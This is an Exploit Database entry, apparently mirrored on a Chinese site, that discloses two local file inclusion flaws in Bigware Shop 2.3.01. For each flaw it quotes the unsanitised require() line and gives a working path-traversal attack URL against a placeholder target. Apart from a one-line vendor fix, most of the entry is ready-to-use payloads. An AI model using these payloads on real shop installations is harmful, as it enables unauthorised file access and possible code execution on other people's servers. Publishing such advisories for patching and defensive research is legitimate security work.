Bigware Shop 2.3.01 – Multiple Local File Inclusions

• Exploit Database
• 13 阅读

• 作者： bd0rk
  日期： 2015-12-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/39083/

• # Title: Bigware Shop 2.3.01 Multiple Local File Inclusion Vulnerabilities
  # Author: bd0rk
  # eMail: bd0rk[at]hackermail.com
  # Twitter: twitter.com/bd0rk
  # Tested on: Ubuntu-Linux
  # Vendor: http://www.bigware.de
  # Download: http://www.bigware.de/download/bigware_software_-_vollversion/Bigware_Shop.zip
  
  
  Proof-of-Concept1:
  
  /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php source-line 58
  **********************************************************************
  require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
  **********************************************************************
  
  [+]Sploit1: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_12.php?language=/../../../../yourFILE.php
  
  ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
  
  
  Proof-of-Concept2: 
  
  /Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php source-line 56
  *********************************************************************
  require ( dirname(dirname(__FILE__)).'/language/'.$language.'.php');
  ********************************************************************* 
  
  [+]Sploit: http://[target]/Bigware_Shop/modules/basic_pricing/configmain/main_bigware_115.php?language=/../../../../yourFILE.php
  
  
  => Vuln-Description: The $language-parameter isn't declared. So an attacker can readin'.
  => Vendor-Solution: Please declare this parameter before require. 
  
  
  
  ***Greetings fr0m Germany: zone-h.org-Team, exploit-db.com, GoLd_M, Kim Dotcom***
  
  MERRY CHRISTMAS BRO'S! :)